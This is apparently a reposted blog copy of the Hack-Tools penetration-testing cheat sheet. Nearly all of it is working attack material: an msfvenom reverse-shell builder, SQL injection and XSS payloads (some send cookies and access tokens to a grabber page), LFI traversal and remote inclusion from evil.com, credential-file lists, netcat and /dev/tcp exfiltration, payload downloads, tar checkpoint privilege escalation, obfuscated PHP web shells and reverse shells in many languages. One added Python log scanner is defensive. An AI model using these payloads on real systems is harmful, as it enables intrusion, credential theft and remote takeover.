Hack-Tools

- Contribute to the project: https://github.com/LasCC/Hack-Tools

MSF Venom Builder

Msfvenom is a command line instance of Metasploit that is used to generate and output all of the various types of shell code that are available in Metasploit.
MSF Venom Command
msfvenom -p generic/shell_reverse_tcp LHOST=10.10.13.37 LPORT=4444 -f aspx-exe
 
Launch Console & Load Handler
msfconsole -qx "use exploit/multi/handler; set PAYLOAD generic/shell_reverse_tcp; set LHOST 10.10.13.37; set LPORT 4444; run"
 
Load Handler Only
use exploit/multi/handler
set PAYLOAD generic/shell_reverse_tcp
set LHOST 10.10.13.37
set LPORT 4444
run

Exploit Feed RSS

Feed about > Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.
 
https://exploit-db.com/
https://tools.cisco.com/security/center/publicationListing.x
https://www.cve-search.org/
https://cxsecurity.com//
 

SQL Injection

SQL injection (SQLi) is an application security weakness that allows attackers to control an application’s database letting them access or delete data, change an application’s data-driven behavior, and do other undesirable things by tricking the application into sending unexpected SQL commands.

Number of columns

'UNION SELECT NULL,NULL,NULL -- -
 
'UNION SELECT NULL,NULL,NULL FROM DUAL -- -
 
' UNION ORDER BY 1 -- -
 

Database enumeration

' UNION SELECT @@version -- -
 
' UNION SELECT banner from v$version -- -
 
' UNION SELECT version from v$instance -- -
 
' UNION SELECT version() -- -
 

Tablename enumeration

' UNION SELECT table_name,NULL from INFORMATION_SCHEMA.TABLES -- -
 
' UNION SELECT table_name,NULL FROM all_tables  -- -
 

Column name enumeration

' UNION SELECT column_name,NULL from INFORMATION_SCHEMA.COLUMNS where table_name="X" -- -
 
' UNION SELECT column_name,NULL FROM  where table_name="X"  -- -
 

Column values concatenation

' UNION SELECT concat(col1,':',col2) from table_name limit 1 -- -
 
' UNION SELECT col1 ':' col2 from table_name limit 1 -- -
 
' UNION SELECT select col1 ||':'||col2, null FROM  where table_name="X"  -- -
 
' UNION SELECT col1+':'+col2,NULL from table_name limit 1 -- -
 

Conditional ( Error Based )

' UNION SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a') -- -
 
' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END -- -
 
' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual -- -
 
' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END -- -
 

Time-Based

,(select * from (select(sleep(10)))a)
 
';WAITFOR DELAY '0:0:30'--
 

Generic Error Based Payloads

MySQL
' UNION SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a') -- -
 
Postgres
' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END -- -
 
Oracle
' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual -- -
 
MSSQL
' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END -- -
 

Authentication Based Payloads

or true--
 
") or true--
 
') or true--
 
admin') or ('1'='1'--
 
admin') or ('1'='1'#
 
admin') or ('1'='1'/
 

Order by and UNION Based Payloads

1' ORDER BY 1--+
 
1' ORDER BY 2--+
 
1' ORDER BY 3--+
 
1' ORDER BY 1,2--+
 
1' ORDER BY 1,2,3--+
 
1' GROUP BY 1,2,--+
 
1' GROUP BY 1,2,3--+
 
' GROUP BY columnnames having 1=1 --
 
-1' UNION SELECT 1,2,3--+
 
' UNION SELECT sum(columnname ) from tablename --
 
-1 UNION SELECT 1 INTO @,@
 
-1 UNION SELECT 1 INTO @,@,@
 
1 AND (SELECT * FROM Users) = 1
 
' AND MID(VERSION(),1,1) = '5';
 

Cross Site Scripting (XSS)

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
To obtain the administrator cookie or a sensitive access token, the following payloads send it to a controlled page.
<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
 
<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
 
<script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>
 
<script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>
 
<script>alert('XSS')</script>
 
<scr<script>ipt>alert('XSS')</scr<script>ipt>
 
"><script>alert("XSS")</script>
 
"><script>alert(String.fromCharCode(88,83,83))</script>
 
<img src=x onerror=alert('XSS');>
 
<img src=x onerror=alert('XSS')//
 
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
 
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
 
<img src=x:alert(alt) onerror=eval(src) alt=xss>
 
"><img src=x onerror=alert("XSS");>
 
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
 
[a](javascript:prompt(document.cookie))
 
[a](j a v a s c r i p t:prompt(document.cookie))
 
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
 
[a](javascript:window.onerror=alert;throw%201)
 
<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>
 
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
 
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
 
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
 
eval('ale'+'rt(0)');
 
Function('ale'+'rt(1)')();
 
new Function`alert`6``;
 
setTimeout('ale'+'rt(2)');
 
setInterval('ale'+'rt(10)');
 
Set.constructor('ale'+'rt(13)')();
 
Set.constructor`alert(14)```;
 

LFI

LFI stands for Local File Includes: a local file inclusion vulnerability allows an attacker to include files that exist on the target web server.
Typically this is exploited by abusing dynamic file inclusion mechanisms that don’t sanitize user input.

Directory traversal

foo.php?file=../../../../../../../etc/passwd
 

PHP Wrapper expect://

/example1.php?page=expect://ls
 

PHP Wrapper php://filter

/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd
 

Remote file inclusion (http://)

http://example.com/index.php?page=http://evil.com/shell.txt
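
The request shapes above are distinctive enough to detect in web server logs. The following is an added example, not part of Hack-Tools or the original post: it classifies access-log lines by the inclusion patterns shown in this section. The rule names, the log format (Apache combined style) and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

RULES = [
    # ".." as a path component, including directly after "resource="
    ("traversal", re.compile(r"(?:^|[/\\=])\.\.(?:[/\\]|$)")),
    ("php_wrapper", re.compile(r"^(?:php|expect|data|zip|phar)://", re.I)),
    # Noisy on redirect-style parameters; scope it to parameters that feed include()
    ("remote_include", re.compile(r"^(?:https?|ftp)://", re.I)),
]

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %252e%252e) before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_request(log_line):
    """Return the sorted rule names matched by any query parameter value."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    hits = set()
    for _name, raw in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        value = fully_decode(raw)
        hits.update(rule for rule, pattern in RULES if pattern.search(value))
    return sorted(hits)

# Constructed sample log lines built from the request examples on this page.
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Aug/2022:19:04:00 +0000] "GET /foo.php?file=../../../../../../../etc/passwd HTTP/1.1" 200 1432',
    '192.0.2.10 - - [09/Aug/2022:19:04:02 +0000] "GET /example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd HTTP/1.1" 200 2210',
    '192.0.2.10 - - [09/Aug/2022:19:04:03 +0000] "GET /example1.php?page=expect://ls HTTP/1.1" 500 312',
    '192.0.2.10 - - [09/Aug/2022:19:04:05 +0000] "GET /index.php?page=http://evil.com/shell.txt HTTP/1.1" 200 98',
    '192.0.2.10 - - [09/Aug/2022:19:04:07 +0000] "GET /foo.php?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1432',
    '198.51.100.7 - - [09/Aug/2022:19:05:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Aug/2022:19:05:04 +0000] "GET /download.php?file=report..final.pdf HTTP/1.1" 200 8841',
]

def scan(lines=SAMPLE_LOG):
    """Return (line_number, matched_rules) for every line with at least one hit."""
    return [(n, hits) for n, line in enumerate(lines, 1)
            if (hits := classify_request(line))]

if __name__ == "__main__":
    for line_no, hits in scan():
        print(line_no, ",".join(hits))
```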
 

Useful LFI files

Linux

/etc/passwd
 
/etc/shadow
 
/etc/issue
 
/etc/group
 
/etc/hostname
 
/etc/ssh/ssh_config
 
/etc/ssh/sshd_config
 
/root/.ssh/id_rsa
 
/root/.ssh/authorized_keys
 
/home/user/.ssh/authorized_keys
 
/home/user/.ssh/id_rsa
 
/proc/[0-9]*/fd/[0-9]*
 
/proc/mounts
 
/home/$USER/.bash_history
 
/home/$USER/.ssh/id_rsa
 
/var/run/secrets/kubernetes.io/serviceaccount
 
/var/lib/mlocate/mlocate.db
 
/var/lib/mlocate.db
 

Apache

/etc/apache2/apache2.conf
 
/usr/local/etc/apache2/httpd.conf
 
/etc/httpd/conf/httpd.conf
 
Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log
 
Debian/Ubuntu -> /var/log/apache2/access.log
 
FreeBSD -> /var/log/httpd-access.log
 
/var/log/apache/access.log
 
/var/log/apache/error.log
 
/var/log/apache2/access.log
 
/var/log/apache/error.log
 

MySQL

/var/lib/mysql/mysql/user.frm
 
/var/lib/mysql/mysql/user.MYD
 
/var/lib/mysql/mysql/user.MYI
 

Windows

/boot.ini
 
/autoexec.bat
 
/windows/system32/drivers/etc/hosts
 
/windows/repair/SAM
 
/windows/panther/unattended.xml
 
/windows/panther/unattend/unattended.xml
 
/windows/system32/license.rtf
 

File Transfer

Various methods of data exfiltration and download from a remote machine.

Bash Upload 

# Upload file over HTTP (requires an HTTP service running on the attacker machine)
bash -c 'echo -e "POST / HTTP/0.9 $(<)" > /dev/tcp//'
 
# Exfiltrate file over TCP
# Listen with Netcat on port + output redirection
nc -l -p > data
 
bash -c 'cat  > /dev/tcp//'
 

Bash Download 

# Send via netcat
nc -l -p  <
 
# Download file on the other machine
bash -c 'cat < /dev/tcp// > '
 

Netcat 

# Upload payload
nc -lnvp ; nc   <
 
# Download
nc   <
 
nc -lnvp  > file_saved
 

Python 

# Python3 HTTP Server
python3 -m http.server
 
# Python2 HTTP Server
python -m SimpleHTTPServer
 

SCP 

# Upload from local host to remote computer
scp  username@IP:~/destination
 
# Download from remote computer
 
scp user@IP:~/path_to_file file_saved 

Powershell handy commands

List of useful Powershell commands

System enumeration

systeminfo
 
Get-WmiObject Win32_ComputerSystem
 
echo "$env:COMPUTERNAME.$env:USERDNSDOMAIN"
 
List Security patches
Get-Hotfix -description "Security update"
 
wmic qfe get HotfixID,ServicePackInEffect,InstallDate,InstalledBy,InstalledOn
 
Environment Variables
Get-ChildItem Env: | ft Key,Value
 
(over cmd.exe)
set
 
Invoke-WebRequest "http://10.10.10.10/shell.exe" -OutFile "shell.exe"
 
Cmd compatible
certutil -urlcache -f http://10.10.10.10/shell.exe shell.exe
 
netsh wlan show profiles
 
netsh wlan show profile name="PROFILE-NAME" key=clear
 
Requires PowerView.ps1
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
 
Domain enumeration
Get-NetDomain
 
List Forest Domains
Get-NetForestDomain
 
Domain SID
Get-DomainSID
 
Domain Policy
Get-DomainPolicy
 
Domain Organizational Units
Get-NetOU
 
List trusted Domains
Get-NetDomainTrust
 
GPO applied to the machine
Get-NetGPO -ComputerName computername.domain.com
 
Last Password Set date
Get-UserProperty -Properties pwdlastset
 
Description of User object
Find-UserField -SearchField Description -SearchTerm "pass"
 
List Computers of the Domain
Get-NetComputer
 
List Pingable Hosts
Get-NetComputer -Ping
 
List Windows 7 Ultimate Computers
Get-NetComputer -OperatingSystem "Windows 7 Ultimate"
 
List Domain Admin members
Get-NetGroupMember -GroupName "Domain Admins"
 
List Admin Groups
Get-NetGroup *admin*
 
List Local Admins [need Administrative rights]
Get-NetLocalGroup -ComputerName PCNAME-001
 
Get groups of user [need Administrative rights]
Get-NetGroup -UserName "username"
 
User ACL
Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs
 
GPO modifications rights
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
 
Password reset rights
Get-ObjectAcl -SamAccountName labuser -ResolveGUIDs -RightsFilter "ResetPassword"
 
Export user accounts with ldifde
ldifde -d "OU=THING,DC=CHANGE,DC=ME" -p subtree -f dump.ldf
 
Export user accounts with csvde
csvde -d "OU=THING,DC=CHANGE,DC=ME" -p subtree -f dump.csv
 
Enumerate Domain Users
# Build the LDAP path for the domain's PDC emulator
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
# samAccountType 805306368 = normal user accounts
$Searcher.filter="samAccountType=805306368"

# To search for specific user, uncomment below
# $Searcher.filter="name=[user_name]"

# Store the results so the loop below has something to iterate over
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }
    Write-Host "------------------------"
}
Enumerate Domain Groups
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="(objectClass=Group)"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    $obj.Properties.name
}
Enumerate Members of a Group
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain

# change "Secret_Group" to correct group name
$Searcher.filter="(name=Secret_Group)"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    $obj.Properties.member
}
Detect Service Principal Names
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="serviceprincipalname=*http*" # change name as needed
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }
}

Useful Linux commands for your Penetration Testing

List of useful commands on Linux
find / -user root -perm /4000 2>/dev/null
 
find / -perm -u=s -type f 2>/dev/null
 
find / -type f -name '*.txt' 2>/dev/null
 
find / -user root -perm -4000 -exec ls -ldb {} \; > /tmp/suid
 
getcap -r / 2>/dev/null
 
cat /etc/issue
 
cat /etc/*-release
 
cat /etc/lsb-release
 
cat /etc/redhat-release
 
cat /proc/version
 
uname -a
 
uname -mrs
 
rpm -q kernel
 
dmesg | grep Linux
 
ls /boot | grep vmlinuz
 
cat /etc/profile
 
cat /etc/bashrc
 
cat ~/.bash_profile
 
cat ~/.bashrc
 
cat ~/.bash_logout
 
env
 
set
 
cat /etc/syslog.conf
 
cat /etc/chttp.conf
 
cat /etc/lighttpd.conf
 
cat /etc/cups/cupsd.conf
 
cat /etc/inetd.conf
 
cat /etc/apache2/apache2.conf
 
cat /etc/my.conf
 
cat /etc/httpd/conf/httpd.conf
 
cat /opt/lampp/etc/httpd.conf
 
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
 
crontab -l
 
ls -alh /var/spool/cron
 
ls -al /etc/ | grep cron
 
ls -al /etc/cron*
 
cat /etc/cron*
 
cat /etc/at.allow
 
cat /etc/at.deny
 
cat /etc/cron.allow
 
cat /etc/cron.deny
 
cat /etc/crontab
 
cat /etc/anacrontab
 
cat /var/spool/cron/crontabs/root
 
lsof -i
 
lsof -i :80
 
grep 80 /etc/services
 
netstat -antup
 
netstat -antpx
 
netstat -tulpn
 
chkconfig --list
 
chkconfig --list | grep 3:on
 
last
 
lastlog
 
FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
 
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
 
ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
 
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port
 
ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port
 
mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe
 
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay
 
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)
 
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)
 
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f" > shell.sh
 
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
 
touch "/var/www/html/--checkpoint=1"

TTY Spawn Shell

Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.

Python spawn shell

python -c 'import pty; pty.spawn("/bin/bash")'
 

All the steps to stabilize your shell

The first step:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys.

Step two is:
export TERM=xterm
 
This will give us access to term commands such as clear.

Finally (and most importantly) we will background the shell using
Ctrl + Z
 
Back in our own terminal we use
stty raw -echo; fg
 
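This does two things: first, it turns off our own terminal echo, which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes; second, fg brings the backgrounded shell back to the foreground.
Then set the terminal size inside the shell to match your own terminal:
stty rows 38 columns 116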
 

OS system spawn shell

echo os.system("/bin/bash")
 

Bash spawn shell

/bin/sh -i
 

Perl spawn shell

perl -e 'exec "/bin/sh";'
 

Ruby spawn shell

ruby: exec "/bin/sh"
 

Lua spawn shell

lua: os.execute("/bin/sh")
 

IRB spawn shell

exec "/bin/sh"
 

VI spawn shell

:!bash
 

VI(2) spawn shell

:set shell=/bin/bash
:shell
 

Nmap spawn shell

!sh

PHP Reverse Shell

Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to obtain an interactive shell session on the target machine and continue their attack.
This script will make an outbound TCP connection to a hardcoded IP and port.
When you have successfully uploaded your payload, just put your commands after the ?cmd= parameter (e.g. ?cmd=ls -la)
<?php system($_GET["cmd"]);?>
 
p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application.
<?=`$_GET[0]`?>
 
Usage : http://target.com/path/to/shell.php?0=command
<?=`$_POST[0]`?>
 
Usage : curl -X POST http://target.com/path/to/shell.php -d "0=command"
<?=`{$_REQUEST['_']}`?>
 
Usage :
- http://target.com/path/to/shell.php?_=command
- curl -X POST http://target.com/path/to/shell.php -d "_=command"
<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
 
Usage :
- http://target.com/path/to/shell.php?0=command
<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>
 
Usage :
- http://target.com/path/to/shell.php?_=function&__=argument
- http://target.com/path/to/shell.php?_=system&__=ls
 
 

Reverse shell

A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the local host.
bash -c 'exec bash -i &>/dev/tcp// <&1'
 
zsh -c 'zmodload zsh/net/tcp && ztcp   && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc   >/tmp/f
 
php -r '$sock=fsockopen(getenv(""),getenv(""));exec("/bin/sh -i <&3 >&3 2>&3");'
 
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 
perl -e 'use Socket;$i="$ENV{}";$p=$ENV{};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
 
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV[""],ENV[""]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
 
TF=$(mktemp -u); mkfifo $TF && telnet   0<$TF | /bin/sh 1>$TF
 
https://chrome.google.com/webstore/detail/hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi
 https://chrome.google.com/webstore/detail/hackbar/ginpbkfigcoaokgflihfhhmglmbchinc

 

posted @ 2022-08-09 19:04  CharyGao